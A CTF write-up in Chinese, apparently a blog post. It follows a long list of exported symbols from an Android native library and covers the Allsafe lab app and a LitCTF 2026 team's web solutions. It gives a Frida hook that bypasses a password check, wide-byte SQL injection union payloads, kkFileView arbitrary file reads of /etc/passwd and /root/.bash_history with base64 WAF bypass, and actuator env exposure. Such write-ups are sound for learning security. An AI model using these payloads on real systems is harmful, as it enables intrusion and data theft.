    "_ZNSt8bad_castD2Ev",
    "_ZTIPKd",
    "_ZNSt11logic_errorC1EPKc",
    "_ZTIPl",
    "_ZdaPvm",
    "_ZNSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE6__initEmc",
    "_ZTIPm",
    "_ZTIPKf",
    "_ZTIDs",
    "_ZNKSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE5rfindEwm",
    "_ZSt15get_new_handlerv",
    "__cxa_demangle",
    "_ZTIPn",
    "_ZTIPKg",
    "_ZTSSt15underflow_error",
    "_ZNSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE6appendERKS5_mm",
    "__cxa_call_unexpected",
    "_ZTIPKh",
    "_ZTIPo",
    "_ZTIDu",
    "_ZTIPKi",
    "_Znam",
    "_ZSt13set_terminatePFvvE",
    "_ZSt15set_new_handlerPFvvE",
    "_ZTIPKj",
    "_ZNSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE21__grow_by_and_replaceEmmmmmmPKw",
    "_ZTVSt16invalid_argument",
    "_ZTIN10__cxxabiv119__pointer_type_infoE",
    "_ZTIa",
    "_ZTIPs",
    "_ZTIPKl",
    "__cxa_begin_catch",
    "_ZNKSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE17find_first_not_ofEPKcmm",
    "_ZTSN10__cxxabiv116__shim_type_infoE",
    "_ZTIb",
    "_ZTIPt",
    "_ZTIPKm",
    "_ZTVSt9bad_alloc",
    "_Z18hardcoreEncryptionP7_JNIEnvP8_jstring",
    "_ZNSt9bad_allocC1Ev",
    "_ZTIc",
    "_ZTIPKn",
    "_ZNSt14overflow_errorD2Ev",
    "_ZNSt12length_errorD1Ev",
    "_ZNSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE5eraseEmm",
    "_ZTIPv",
    "_ZTIPKo",
    "_ZTId",
    "_ZNSt13bad_exceptionD2Ev",
    "_ZNSt13runtime_errorC2EPKc",
    "_ZNSt6__ndk1plIcNS_11char_traitsIcEENS_9allocatorIcEEEENS_12basic_stringIT_T0_T1_EEPKS6_RKS9_",
    "_ZTVSt12out_of_range",
    "_ZTIPw",
    "_ZNSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEEC2IDnEEPKc",
    "_ZdaPvSt11align_val_tRKSt9nothrow_t",
    "_ZNSt6__ndk110to_wstringEd",
    "_ZTIPx",
    "_ZTIf",
    "_ZNSt20bad_array_new_lengthC1Ev",
    "__gxx_personality_v0",
    "_ZTIPy",
    "_ZTIg",
    "_ZNSt11logic_errorC2ERKS_",
    "_ZNSt13runtime_errorC2ERKNSt6__ndk112basic_stringIcNS0_11char_traitsIcEENS0_9allocatorIcEEEE",
    "_ZNSt6__ndk110to_wstringEf",
    "__cxa_uncaught_exception",
    "_ZTIh",
    "_ZTIPKs",
    "_ZTSSt13bad_exception",
    "_ZTVSt11range_error",
    "_ZNSt15underflow_errorD2Ev",
    "_ZTVSt9type_info",
    "_ZdlPvmSt11align_val_t",
    "_ZNSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE9__grow_byEmmmmmm",
    "_ZNSt6__ndk110to_wstringEg",
    "_ZTIPKt",
    "_ZTIi",
    "_ZNSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEEaSEw",
    "_ZNSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE5eraseEmm",
    "_ZTIj",
    "_ZNSt6__ndk15stoldERKNS_12basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEEEPm",
    "_ZNSt6__ndk110to_wstringEi",
    "_ZTIPKv",
    "_ZNSt9exceptionD0Ev",
    "_ZNSt9bad_allocD0Ev",
    "_ZNSt11range_errorD0Ev",
    "_ZNSt13runtime_errorD1Ev",
    "_ZNSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEED1Ev",
    "_ZdaPv",
    "_ZNSt6__ndk110to_wstringEj",
    "_ZNSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEEC1ERKS5_mmRKS4_",
    "_ZTIPKw",
    "_ZTIl",
    "_ZNSt12out_of_rangeD0Ev",
    "_ZNSt11logic_erroraSERKS_",
    "_ZTIm",
    "_ZTIPKx",
    "_ZNSt16invalid_argumentD0Ev",
    "_ZTSSt14overflow_error",
    "_ZNSt9type_infoD0Ev",
    "_ZNSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE6assignEPKc",
    "_ZNSt6__ndk110to_wstringEl",
    "__cxa_get_globals",
    "_ZTVN10__cxxabiv119__pointer_type_infoE",
    "_ZTIPKy",
    "_ZTIn",
    "_ZNSt20bad_array_new_lengthD0Ev",
    "_ZNKSt10bad_typeid4whatEv",
    "_ZNSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE6appendEPKw",
    "_ZNSt6__ndk110to_wstringEm",
    "_ZTIo",
    "_ZTVN10__cxxabiv121__vmi_class_type_infoE",
    "_ZTSSt9exception",
    "_ZNSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEEC2ERKS5_",
    "_ZNSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE6insertEmPKcm",
    "_ZNSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEEC1ERKS5_RKS4_",
    "_ZNSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEEC1ERKS5_RKS4_",
    "_ZNKSt9exception4whatEv",
    "_ZNSt8bad_castC1Ev",
    "_ZNSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEEC1ERKS5_",
    "_ZNSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE9push_backEc",
    "_ZNKSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE4findEPKwmm",
    "_ZTIN10__cxxabiv117__array_type_infoE",
    "_ZTVSt15underflow_error",
    "_ZNKSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE5rfindEPKcmm",
    "_ZNKSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE7compareEPKc",
    "_ZNSt6__ndk16stoullERKNS_12basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEEEPmi",
    "_ZTVSt12domain_error",
    "_ZNSt10bad_typeidC2Ev",
    "_ZTVN10__cxxabiv116__shim_type_infoE",
    "_ZTIs",
    "Java_infosecadventures_allsafe_challenges_NativeLibrary_checkPassword",
    "_ZSt7nothrow",
    "_ZNSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE21__grow_by_and_replaceEmmmmmmPKc",
    "_ZNSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE6__initEPKwm",
    "_ZTIt",
    "_ZdlPvSt11align_val_tRKSt9nothrow_t",
    "_ZNKSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE4findEPKcmm",
    "_ZNSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE6__initEPKwmm",
    "_ZNSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE9push_backEw",
    "_ZNKSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE7compareEmmPKc",
    "_ZNKSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE7compareEPKw",
    "_ZTIv",
    "_ZTIN10__cxxabiv121__vmi_class_type_infoE",
    "_ZTSSt20bad_array_new_length",
    "_ZTISt16invalid_argument",
    "_ZTIw",
    "_ZTSPKDh",
    "__cxa_new_handler",
    "_ZTIx",
    "_ZTSPKDi",
    "_ZTVN10__cxxabiv117__pbase_type_infoE",
    "_ZNSt8bad_castD0Ev",
    "_ZNSt6__ndk16__itoa8__u32toaEjPc",
    "_ZTISt9bad_alloc",
    "_ZTIy",
    "_ZTSN10__cxxabiv117__array_type_infoE",
    "_ZNSt6__ndk117__compressed_pairINS_12basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE5__repES5_EC2INS_18__default_init_tagESA_EEOT_OT0_",
    "_ZNSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE6__initEPKcm",
    "__cxa_end_catch",
    "_ZNSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE6insertEmPKwm",
    "_ZNKSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE7compareEmmPKw",
    "_ZNSt6__ndk110to_wstringEx",
    "_ZSt10unexpectedv",
    "_ZTIPDh",
    "_ZNSt10bad_typeidD1Ev",
    "_ZNSt6__ndk110to_wstringEy",
    "_ZTIPDi",
    "_ZNSt11logic_errorD1Ev",
    "_ZSt13get_terminatev",
    "_ZTIN10__cxxabiv116__shim_type_infoE",
    "_ZNSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE6appendEmc",
    "_ZNSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE6insertENS_11__wrap_iterIPKcEEc",
    "_ZNSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE6__initEmw",
    "_ZTVN10__cxxabiv117__class_type_infoE",
    "_ZTSPKDn",
    "_ZdlPvSt11align_val_t",
    "_ZNKSt6__ndk121__basic_string_commonILb1EE20__throw_out_of_rangeEv",
    "_ZNSt12domain_errorD1Ev",
    "_ZdlPv",
    "_ZTISt9type_info",
    "_ZNSt6__ndk15stollERKNS_12basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEEEPmi",
    "_ZTVN10__cxxabiv120__si_class_type_infoE",
    "_ZTIPDn",
    "_ZTSN10__cxxabiv116__enum_type_infoE",
    "_ZTISt8bad_cast",
    "_ZNSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE6insertENS_11__wrap_iterIPKwEEw",
    "_ZNKSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE17find_first_not_ofEPKwmm",
    "_ZTSPKDs",
    "_ZTVSt11logic_error",
    "__cxa_rethrow_primary_exception",
    "_ZNSt14overflow_errorD0Ev",
    "_ZTSSt16invalid_argument",
    "_ZTISt10bad_typeid",
    "_ZNSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEEC2ERKS5_",
    "_ZNSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEEC1ERKS5_mmRKS4_",
    "_ZTSPKDu",
    "_ZNSt13bad_exceptionD0Ev",
    "_ZNSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEEC2ERKS5_RKS4_",
    "_ZNSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEEC2ERKS5_RKS4_",
    "_ZNSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEEC1ERKS5_",
    "_ZTIPDs",
    "_ZTISt12out_of_range",
    "_ZTIPDu",
    "_ZNSt6__ndk14stofERKNS_12basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEEEPm",
    "_ZTSPKa",
    "_ZNSt15underflow_errorD0Ev",
    "_ZNSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE6insertEmmw",
    "_ZNSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE6insertEmRKS5_mm",
    "_ZNSt6__ndk14stolERKNS_12basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEEEPmi",
    "_ZTSPKb",
    "_ZNSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE6appendEPKwm",
    "_ZNSt6__ndk14stoiERKNS_12basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEEEPmi",
    "_ZTISt13bad_exception",
    "_ZTSPKc",
    "_ZTSSt12out_of_range",
    "_ZNSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE7reserveEm",
    "__cxa_get_globals_fast",
    "_ZTSPKd",
    "_ZTISt11range_error",
    "_ZnwmRKSt9nothrow_t",
    "_ZTVSt12length_error",
    "_ZNSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE6insertEmRKS5_mm",
    "_ZTSPKf",
    "__emutls_get_address",
    "_ZTSPKg",
    "_ZnamSt11align_val_tRKSt9nothrow_t",
    "_ZNKSt6__ndk121__basic_string_commonILb1EE20__throw_length_errorEv",
    "_ZNSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE7replaceEmmPKcm",
    "__cxa_terminate_handler",
    "_ZTSPKh",
    "_ZnwmSt11align_val_t",
    "_ZNSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE6appendEPKcm",
    "_ZTSPKi",
    "_ZTSPKj",
    "_ZTVN10__cxxabiv116__enum_type_infoE",
    "_ZNSt11logic_errorC2ERKNSt6__ndk112basic_stringIcNS0_11char_traitsIcEENS0_9allocatorIcEEEE",
    "_ZTVSt13bad_exception",
    "_ZTSPKl",
    "_ZNKSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE2atEm",
    "_ZNSt6__ndk14stodERKNS_12basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEEEPm",
    "_ZTSPKm",
    "_ZNSt9bad_allocC2Ev",
    "_ZNSt13runtime_errorC1ERKS_",
    "_ZNSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEEC2ERKS5_mmRKS4_",
    "_ZTIN10__cxxabiv129__pointer_to_member_type_infoE",
    "_ZTSPKn",
    "_ZNSt12length_errorD2Ev",
    "_ZTVSt8bad_cast",
    "_ZTSPKo",
    "_ZN7_JNIEnv14GetArrayLengthEP7_jarray",
    "_ZNSt11logic_errorC2EPKc",
    "_ZNSt20bad_array_new_lengthC2Ev",
    "_ZTVSt20bad_array_new_length",
    "_ZTISt12domain_error",
    "_ZTSSt12domain_error",
    "_ZTISt14overflow_error",
    "_ZNSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE6assignEmc",
    "__cxa_get_exception_ptr",
    "_ZNSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE7reserveEm",
    "_ZTSSt9bad_alloc",
    "_ZNKSt11logic_error4whatEv",
    "_ZTSSt11range_error",
    "_ZTSPKs",
    "_ZTIN10__cxxabiv116__enum_type_infoE",
    "_ZNSt6__ndk19to_stringEd",
    "_ZTSPKt",
    "_ZNKSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE7compareEmmRKS5_mm",
    "_ZNSt9bad_allocD1Ev",
    "_ZNSt9exceptionD1Ev",
    "_ZNSt13runtime_errorD2Ev",
    "_ZNSt11range_errorD1Ev",
    "_ZNSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEED2Ev",
    "_ZNSt12out_of_rangeD1Ev",
    "_ZNSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE2atEm",
    "_ZNSt6__ndk19to_stringEf",
    "_ZTSPKv",
    "_ZNKSt13bad_exception4whatEv",
    "_ZNSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEEaSEc",
    "_ZNSt16invalid_argumentD1Ev",
    "_ZNSt6__ndk19to_stringEg",
    "_ZTIN10__cxxabiv123__fundamental_type_infoE",
    "_ZTSPKw",
    "_ZNSt9type_infoD1Ev",
    "_ZNSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE6appendEmw",
    "_ZNSt6__ndk15stoulERKNS_12basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEEEPmi",
    "_ZTSPKx",
    "_ZTIPKDh",
    "_ZNSt20bad_array_new_lengthD1Ev",
    "_ZTSSt9type_info",
    "_ZdlPvRKSt9nothrow_t",
    "_ZNSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE7replaceEmmRKS5_mm",
    "_ZNSt6__ndk19to_stringEi",
    "_ZTSPKy",
    "_ZTIPKDi",
    "_ZNSt6__ndk19to_stringEj",
    "__cxa_pure_virtual",
    "_ZTVN10__cxxabiv120__function_type_infoE",
    "_ZNSt8bad_castC2Ev",
    "_ZSt14set_unexpectedPFvvE",
    "_ZTSN10__cxxabiv121__vmi_class_type_infoE",
    "_ZNSt6__ndk16__itoa8__u64toaEmPc",
    "_ZNSt6__ndk19to_stringEl",
    "__dynamic_cast",
    "_ZNSt6__ndk19to_stringEm",
    "_Z9checkPassP7_JNIEnvP8_jstring",
    "_ZNSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE6appendEPKc",
    "_ZNSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE6resizeEmc",
    "_ZNSt6__ndk15stoldERKNS_12basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEEEPm",
    "_ZTIPKDn",
    "_ZnamSt11align_val_t",
    "_ZNKSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE4copyEPwmm",
    "_ZNSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEED1Ev",
    "_ZTISt11logic_error",
    "_ZN7_JNIEnv12NewStringUTFEPKc",
    "_ZTSN10__cxxabiv119__pointer_type_infoE",
    "_ZTSa",
    "_ZNKSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE5rfindEPKwmm",
    "_ZTSb",
    "_ZNKSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE16find_last_not_ofEPKwmm",
    "__cxa_uncaught_exceptions",
    "_ZTSN10__cxxabiv129__pointer_to_member_type_infoE",
    "_ZTSc",
    "_ZNSt8bad_castD1Ev",
    "_ZNSt13runtime_errorC1EPKc",
    "_ZTSd",
    "_ZTIPKDs",
    "_Znwm",
    "_ZdaPvRKSt9nothrow_t",
    "_ZNSt11logic_errorC1ERKS_",
    "_ZNSt10bad_typeidD2Ev",
    "_ZNSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE7replaceEmmmc",
    "_ZTSPDh",
    "_ZTSf",
    "_ZTIPKDu",
    "_ZNSt11logic_errorD2Ev",
    "_ZNSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEEC2ERKS5_mmRKS4_",
    "_ZTIN10__cxxabiv117__pbase_type_infoE",
    "_ZTSg",
    "_ZTSPDi",
    "_ZTSh",
    "_ZTSSt13runtime_error",
    "_ZNSt13runtime_errorC1ERKNSt6__ndk112basic_stringIcNS0_11char_traitsIcEENS0_9allocatorIcEEEE",
    "_ZNSt6__ndk19to_stringEx",
    "_ZTSi",
    "_ZNSt12domain_errorD2Ev",
    "_ZNSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE7replaceEmmPKc",
    "_ZNKSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE2atEm",
    "_ZNKSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE13find_first_ofEPKwmm",
    "_ZNSt6__ndk19to_stringEy",
    "_ZTSj",
    "_ZNKSt9bad_alloc4whatEv",
    "_ZTVSt10bad_typeid",
    "_ZNSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE6__initEPKcmm",
    "_ZTISt12length_error",
    "_ZNSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE7replaceEmmPKwm",
    "_ZNSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE6assignEPKwm",
    "__cxa_free_dependent_exception",
    "_ZTIN10__cxxabiv117__class_type_infoE",
    "_ZTSPDn",
    "_ZTSl",
    "_ZNKSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE7compareEmmPKcm",
    "__cxa_current_exception_type",
    "_ZTSPa",
    "_ZTSm",
    "_ZNSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE6assignERKS5_mm",
    "_ZNSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE7replaceEmmPKw",
    "_ZTSPb",
    "_ZTSn",
    "_ZTSDh",
    "_ZTISt20bad_array_new_length",
    "_ZTSSt11logic_error",
    "_ZNSt14overflow_errorD1Ev",
    "_ZNKSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE16find_last_not_ofEPKcmm",
    "_ZNSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE2atEm",
    "_ZNSt13bad_exceptionD1Ev",
    "_ZTSN10__cxxabiv117__pbase_type_infoE",
    "_ZTSPc",
    "_ZTSo",
    "_ZTSDi",
    "_ZTSN10__cxxabiv120__si_class_type_infoE",
    "_ZNKSt13runtime_error4whatEv",
    "_ZNSt12length_errorD0Ev",
    "_ZTSSt12length_error",
    "_ZNSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE6assignEmw",
    "_ZNSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE6assignEPKw",
    "_ZTSPd",
    "_ZNSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE6assignEPKcm",
    "_ZNKSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE4findEcm",
    "_ZTSPDs",
    "_ZTIN10__cxxabiv120__si_class_type_infoE",
    "_ZTSPf",
    "_ZnwmSt11align_val_tRKSt9nothrow_t",
    "_ZTSs",
    "_ZTSPg",
    "_ZTSPDu",
    "_ZNSt15underflow_errorD1Ev",
    "_ZTSSt10bad_typeid",
    "_ZNSt6__ndk16stoullERKNS_12basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEEEPmi",
    "_ZTSDn",
    "_ZTSPh",
    "_ZTSt",
    "_ZTVSt9exception",
    "__cxa_current_primary_exception",
    "_ZTSPi",
    "_ZTSv",
    "_ZTSPj",
    "_ZNSt13runtime_errorD0Ev",
    "_ZdaPvSt11align_val_t",
    "_ZTSw",
    "_ZTSN10__cxxabiv117__class_type_infoE",
    "_ZTSPl",
    "_ZTSx",
    "_ZTVN10__cxxabiv117__array_type_infoE",
    "_ZTISt15underflow_error",
    "_ZNSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE6insertEmmc",
    "_ZNSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEEaSERKS5_",
    "_ZTSPm",
    "_ZTSy",
    "_ZTSDs",
    "_ZnamRKSt9nothrow_t",
    "_ZNSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE7replaceEmmmw",
    "__cxa_allocate_dependent_exception",
    "_ZTSPn",
    "_ZNKSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE12find_last_ofEPKwmm",
    "__cxa_increment_exception_refcount",
    "_ZTSPo",
    "_ZTSDu",
    "_ZN7_JNIEnv20GetByteArrayElementsEP11_jbyteArrayPh",
    "_ZNKSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE13find_first_ofEPKcmm",
    "_ZNSt6__ndk14stofERKNS_12basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEEEPm",
    "__cxa_decrement_exception_refcount",
    "_ZNSt10bad_typeidC1Ev",
    "_ZTVN10__cxxabiv123__fundamental_type_infoE",
    "_ZTSPs",
    "_ZSt9terminatev",
    "_ZdlPvm",
    "_ZTSN10__cxxabiv123__fundamental_type_infoE",
    "_ZTSPt",
    "_ZNSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE6appendERKS5_mm",
    "_ZNSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE6resizeEmw",
    "__cxa_allocate_exception",
    "_ZNSt6__ndk15stollERKNS_12basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEEEPmi",
    "_ZTSPv",
    "_ZTVSt14overflow_error"
]

找check_password的地址一会hook，让我们无论输入什么，都能通过密码验证

[Android Emulator 5554::Allsafe ]-> Process.getModuleByName("libnative_library.so").getExportByName("Java_infosecadvent
ures_allsafe_challenges_NativeLibrary_checkPassword")
"0x7638795a4430"

现在把地址赋给一个变量，一会使用 Interceptor 来钩住该函数，并劫持其实现，使其对提供的任何密码都返回 true。https://frida.re/docs/javascript-api/#interceptor

[Android Emulator 5554::Allsafe ]-> var addr = Process.getModuleByName("libnative_library.so").getExportByName("Java_in
fosecadventures_allsafe_challenges_NativeLibrary_checkPassword");
[Android Emulator 5554::Allsafe ]-> console.log("[addr] " + addr);
[addr] 0x7638795a4430
[Android Emulator 5554::Allsafe ]-> Interceptor.attach(addr, {
  onEnter(args) {
    console.log("[*] checkPassword called");
  },
  onLeave(retval) {
    console.log("[*] original retval =", retval.toInt32());
    retval.replace(1);
    console.log("[+] forced success");
  }
});
{}
[Android Emulator 5554::Allsafe ]-> [*] checkPassword called
[*] original retval = 0
[+] forced success

随便输入都能通过验证，当然你也可以用apktool拿到so文件，然后IDA分析，发现密码就静态编译在里面，这里只是用frida来展示hook

Smali Patch

这一关就是改smail代码，实现点击输出Firewall is now activated, good job!

这里我直接用MT管理器打开演示一下

在class4.dex里

修改为

成功

LitCTF 2026 Hnusec1 战队 wp

Mon, 01 Jun 2026 00:00:00 GMT

队伍名称：Hnusec1

成员用户名：weixiao cinco J4toPos

队伍排名：8

web

lit_ezsql

进入后是一个查询页面

我们正常输入id=1，回显一行五列结果

首先是尝试了常规的 " ' \ 但都没有触发报错，这里我们换一个思路

尝试一下宽字节注入，出现报错

id=1%df%27

这个payload就相当于宽字节前缀 + 单引号，在 GBK 编码下会被数据库解释成一个合法的宽字节字符

继续测试

?id=1%df%27 or 1=1%23

返回了两行数据，说明注入确认成功。

由于正常查询结果中页面回显了五个字段，因此可以直接尝试五列联合查询。

?id=-1%df' union select 1,2,3,4,5%23

注入成功

查数据库

?id=-1%df' union select 1,database(),3,4,5%23

得到

ezsql

查表名

?id=-1%df' union select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=database()%23

得到

users,flag_store

查列名，注意这里要用十六进制绕过引号

?id=-1%df' union select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name=0x666c61675f73746f7265%23

得到

id,flag

最后读flag

?id=-1%df' union select 1,flag,3,4,5 from flag_store%23

得到

flag{stlqpk43-cxn2-4vp-8dve-9vdtmpqho6ndq}

Northbridge Document Hub

进入后是一个登录界面

查看前端源码，发现会加载 assets/js/portal.js

看一下这个js

(function () {
    var bootstrap = {
        release: "2026.03.01-r12",
        region: "cn-sh2",
        auth: {
            mode: "legacy-fallback",
            // researcher:Research#2026
            seed: "cmVzZWFyY2hlcjpSZXNlYXJjaCMyMDI2"
        },
        fileGateway: {
            path: "/kkfileview/getCorsFile",
            queryKey: "urlPath",
            node: "legacy-parse-02"
        }
    };

    window.NorthbridgePortal = {
        config: bootstrap,
        decodeLegacyCredential: function () {
            try {
                return atob(bootstrap.auth.seed);
            } catch (e) {
                return "";
            }
        }
    };

    var form = document.querySelector("form[data-auth='portal']");
    if (form) {
        form.addEventListener("submit", function () {
            form.classList.add("is-submitting");
        });
    }
})();

有一个base64

cmVzZWFyY2hlcjpSZXNlYXJjaCMyMDI2

可以拿到密码去登录

researcher
Research#2026

登录后进入

这里检索一下有没有 kkFileView 的 cve

这里有一个 CVE-2021-43734

https://blog.csdn.net/weixin_44304678/article/details/134320057

可以构造poc

/kkfileview/getCorsFile?urlPath=file:///etc/passwd

但是如果直接发会失败，说明设了一个简单的waf

根据源码猜测可能是要base64编码绕过，尝试进行一下编码

file:///etc/passwd
ZmlsZTovLy9ldGMvcGFzc3dk

实现绕过，可以任意文件读取

这里我们去读的是

/root/.bash_history

也就是

ZmlsZTovLy9yb290Ly5iYXNoX2hpc3Rvcnk=

得到

cd /opt/kkfileview/bin
./startup.sh --cache.dir=/opt/kkfileview/cache/parsed
java -jar kkFileView.jar --cache.dir=/opt/kkfileview/cache/parsed --forceUpdatedCache=true
cp /opt/kkfileview/cache/parsed/q1_finance_report_2026.zip /tmp/q1_finance_report_2026.zip

我们直接去读

/opt/kkfileview/cache/parsed/q1_finance_report_2026.zip

解压后拿到flag

flag{fic9nvxj-lyyc-4zq-8iv6-rbjnqwyfjbbre}

华辰企业服务运营平台

进入后是一个运营平台，进入系统需要登录

dirsearch扫一下，可以发现有一个 /actuator

访问后暴露一些路由

我们直接去读

/actuator/env

可以直接拿到flag

flag{ijap7qay-mqfe-4yo-8pk3-cchdrmx9ckloj}

lit_reverse_my_web

题目给了一个exe附件，为什么web手还得会逆向（）

扔进ida,分析main

也就是 Go 源码大致长这样：

// internal/jwtsecret/jwtsecret.go
var encKey = []byte{
    0x28,0x17,0x2D,0x05, 0x68,0x6A,0x68,0x6C,
    0x05,0x36,0x33,0x2E, 0x39,0x2E,0x3C,0x05,
    0x30,0x2D,0x2E,0x05, 0x29,0x3F,0x39,0x28,
    0x3F,0x2E,0x05,0x31, 0x3F,0x23,0x7B,0x7B,
}

func Key() []byte {
    out := make([]byte, len(encKey))
    for i, b := range encKey {
        out[i] = b ^ 0x5A
    }
    return out
}

提取 encKey

reverseMyWeb\_internal\_jwtsecret\.encKey 实际是一个 slice header，位于 \.data 段：

0xF68950: E0 E6 F0 00 00 00 00 00   // ptr  -> 0xF0E6E0
0xF68958: 20 00 00 00 00 00 00 00   // len  = 32
0xF68960: 20 00 00 00 00 00 00 00   // cap  = 32

读 0xF0E6E0 的 32 字节：

